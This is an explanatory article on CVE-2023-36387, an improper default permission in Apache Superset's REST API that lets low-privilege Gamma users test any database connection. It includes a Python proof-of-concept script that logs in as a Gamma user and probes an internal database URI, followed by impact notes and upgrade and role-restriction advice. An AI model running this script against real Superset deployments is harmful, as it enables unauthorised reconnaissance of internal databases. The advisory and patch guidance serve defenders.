CVE-2023-36387 - How Improper Default REST API Permissions in Apache Superset Expose Sensitive Database Operations

---

Introduction

In June 2023, a significant security issue was disclosed in Apache Superset—an open-source data visualization and exploration platform. The vulnerability, identified as CVE-2023-36387, arises due to improper default permissions in the REST API for so-called "Gamma" users. As a result, these users (who are supposed to have limited access) can test any database connection configured in Superset, creating a clear risk in environments where data access should be tightly restricted.

In this article, we’ll break down what CVE-2023-36387 is, demonstrate how it works with code, point to the original references, and show how this issue could be exploited. All in simple, clear language.

What is Apache Superset?

Apache Superset is a modern platform for exploring and visualizing data. Companies use it to let users analyze and present data from many sources. Superset has a role-based access control system, with Gamma users being the lowest-level role—meant only to explore dashboards, not manage deeper data connections.

What is CVE-2023-36387?

The vulnerability lies in the way REST API permissions are assigned by default to Gamma users. Gamma users should NOT be able to test database connections. However, up to version 2.1., they can send a specially crafted API request to test *any* database configured in Superset.

That means a Gamma user—intended to be a basic viewer—can poke connections and possibly get information about databases they're not permitted to access.

Official Advisory

- CVE-2023-36387 NVD Entry
- Apache Superset Security Advisory
- Superset pull request fixing the issue

The problematic endpoint in the Superset REST API is

POST /api/v1/database/test_connection

By default, Gamma users were allowed to use this API, letting them check if a database connection is valid. That opens doors for privilege escalation, information leaks, and more.

Log in to Superset with Gamma-level credentials.

2. Craft and send a POST request to /api/v1/database/test_connection with the details for any configured database (including ones they shouldn’t know about).

Analyze the response to confirm if the external or internal database is reachable and active.

This could enable further attacks: testing internal, sensitive connections, mapping out available databases, or attempting brute-force credentials.

Proof of Concept (PoC) Code

Here’s a simple Python script using the popular requests library to show how easy this exploit is in practice:

import requests

# Replace with your Superset instance URL
SUPSERSET_URL = "https://superset.example.com";
LOGIN_URL = f"{SUPSERSET_URL}/login/"
TEST_CONN_URL = f"{SUPSERSET_URL}/api/v1/database/test_connection"

# Credentials of the Gamma user
USERNAME = "gammauser"
PASSWORD = "password"

# Start a session to persist cookies
session = requests.Session()

# 1. Log in to Superset
login_payload = {
    "username": USERNAME,
    "password": PASSWORD,
    "provider": "db",
}

headers = {
    "Content-Type": "application/json",
}

# This endpoint may vary; adjust according to your login setup
login_resp = session.post(
    f"{SUPSERSET_URL}/api/v1/security/login",
    json=login_payload,
    headers=headers
)
if login_resp.status_code != 200:
    print("Login failed!")
    exit(1)

# Extract JWT or use session cookie, depending on Superset config
access_token = login_resp.json().get("access_token")
if not access_token:
    print("Could not find access_token in response!")
    exit(1)

headers["Authorization"] = f"Bearer {access_token}"

# 2. Test a forbidden database connection (IDs must be valid in your Superset)
data = {
    "database_name": "sensitive_database",
    "sqlalchemy_uri": "postgresql://sensitive_user:s3cr3t@db.internal/sensitivedb"
}

test_resp = session.post(
    TEST_CONN_URL, 
    json=data,
    headers=headers
)

print("Test response status:", test_resp.status_code)
print("Response body:", test_resp.text)

Note: This script may need to be adjusted for your specific login API. The key here is that Gamma-level users, via their token or session, can access this REST endpoint and test connections.

Impact

- Sensitive Information Exposure: Internal DB connection info can be enumerated/tested.

Privilege Escalation: Potential stepping stone to deeper attacks.

- Reconnaissance: Attackers can map which databases exist and are reachable from the Superset server.

Upgrade!

The vulnerability is patched in Superset v2.1.1 and later. Upgrade to at least this version.

Edit the Gamma role’s permissions.

4. Remove can_test_connection for the Database ModelView/REST API endpoints.

References

- NVD CVE-2023-36387
- Superset Security Advisory: GHSA-8fjc-2xmf-h89x
- GitHub PR fixing the issue

In Summary

CVE-2023-36387 is a good example of how small permission mistakes can open big holes, even in widely-used data tools like Apache Superset. Always review your role permissions, update regularly, and keep an eye on API privilege boundaries.

Upgrading is the easiest and best fix. If you must stay on an older version, restrict the Gamma role immediately—and keep your users safe.


*Exclusive for your understanding: If you use Superset, check your version and lock down those Gamma rights!*

Timeline

Published on: 09/06/2023 13:15:00 UTC
Last modified on: 10/19/2023 18:47:00 UTC